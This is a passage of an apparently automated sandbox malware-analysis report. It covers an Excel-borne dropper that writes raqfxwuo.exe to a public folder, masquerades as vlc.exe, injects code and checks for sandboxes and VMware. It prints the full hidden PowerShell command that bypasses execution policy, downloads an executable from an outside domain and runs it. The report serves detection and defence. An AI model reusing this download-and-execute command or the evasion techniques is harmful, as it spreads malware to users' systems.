                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\raqfxwuo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
                Source: TcLt4.xlsStream path 'Workbook' entropy: 7.92744536188 (max. 8.0)

                Malware Analysis System Evasion:

                barindex
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                Source: raqfxwuo.exe, 00000012.00000002.899007964.0000000003351000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.899126979.0000000002781000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\raqfxwuo.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\Public\raqfxwuo.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3327
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3804
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4394
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4360
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 240Thread sleep time: -6456360425798339s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6352Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4620Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7000Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\System32\conhost.exe TID: 5764Thread sleep count: 40 > 30
                Source: C:\Users\Public\raqfxwuo.exe TID: 6160Thread sleep count: 51 > 30
                Source: C:\Users\Public\raqfxwuo.exe TID: 6180Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\Public\raqfxwuo.exe TID: 6556Thread sleep count: 43 > 30
                Source: C:\Users\Public\raqfxwuo.exe TID: 6164Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe TID: 6612Thread sleep count: 64 > 30
                Source: C:\Users\Public\raqfxwuo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Users\Public\raqfxwuo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Windows\splwow64.exeLast function: Thread delayed
                Source: C:\Windows\splwow64.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                Source: powershell.exe, 0000000E.00000003.850698352.000001FCD6906000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                Source: powershell.exe, 0000000E.00000002.874605943.000001FCD6D20000.00000002.00000001.sdmp, powershell.exe, 0000000F.00000002.878640218.000001DF98CB0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: raqfxwuo.exe, 00000013.00000002.899812607.000000000289F000.00000004.00000001.sdmpBinary or memory string: vmware
                Source: powershell.exe, 0000000F.00000003.852668699.000001DF986A3000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\le
                Source: powershell.exe, 0000000F.00000003.852668699.000001DF986A3000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
                Source: powershell.exe, 0000000E.00000002.874605943.000001FCD6D20000.00000002.00000001.sdmp, powershell.exe, 0000000F.00000002.878640218.000001DF98CB0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: powershell.exe, 0000000E.00000002.874605943.000001FCD6D20000.00000002.00000001.sdmp, powershell.exe, 0000000F.00000002.878640218.000001DF98CB0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: powershell.exe, 0000000F.00000003.852668699.000001DF986A3000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
                Source: powershell.exe, 0000000E.00000002.874605943.000001FCD6D20000.00000002.00000001.sdmp, powershell.exe, 0000000F.00000002.878640218.000001DF98CB0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\Public\raqfxwuo.exeProcess token adjusted: Debug
                Source: C:\Users\Public\raqfxwuo.exeProcess token adjusted: Debug
                Source: C:\Users\Public\raqfxwuo.exeProcess token adjusted: Debug
                Source: C:\Users\Public\raqfxwuo.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess token adjusted: Debug
                Source: C:\Users\Public\raqfxwuo.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Bypasses PowerShell execution policyShow sources
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/Jqeofcirr6.exe -OutFile C:\Users\Public\raqfxwuo.exe}; & {Start-Process -FilePath 'C:\Users\Public\raqfxwuo.exe'}'
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\Public\raqfxwuo.exeMemory written: C:\Users\Public\raqfxwuo.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\Public\raqfxwuo.exeMemory written: C:\Users\Public\raqfxwuo.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\raqfxwuo.exe 'C:\Users\Public\raqfxwuo.exe'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\raqfxwuo.exe 'C:\Users\Public\raqfxwuo.exe'
                Source: C:\Users\Public\raqfxwuo.exeProcess created: C:\Users\Public\raqfxwuo.exe C:\Users\Public\raqfxwuo.exe
                Source: C:\Users\Public\raqfxwuo.exeProcess created: C:\Users\Public\raqfxwuo.exe C:\Users\Public\raqfxwuo.exe
                Source: raqfxwuo.exe, 00000014.00000002.926451245.0000000001770000.00000002.00000001.sdmp, raqfxwuo.exe, 00000015.00000002.926400314.0000000001970000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: raqfxwuo.exe, 00000014.00000002.926451245.0000000001770000.00000002.00000001.sdmp, raqfxwuo.exe, 00000015.00000002.926400314.0000000001970000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: raqfxwuo.exe, 00000014.00000002.926451245.0000000001770000.00000002.00000001.sdmp, raqfxwuo.exe, 00000015.00000002.926400314.0000000001970000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: raqfxwuo.exe, 00000014.00000002.926451245.0000000001770000.00000002.00000001.sdmp, raqfxwuo.exe, 00000015.00000002.926400314.0000000001970000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Users\Public\raqfxwuo.exe VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\Public\raqfxwuo.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
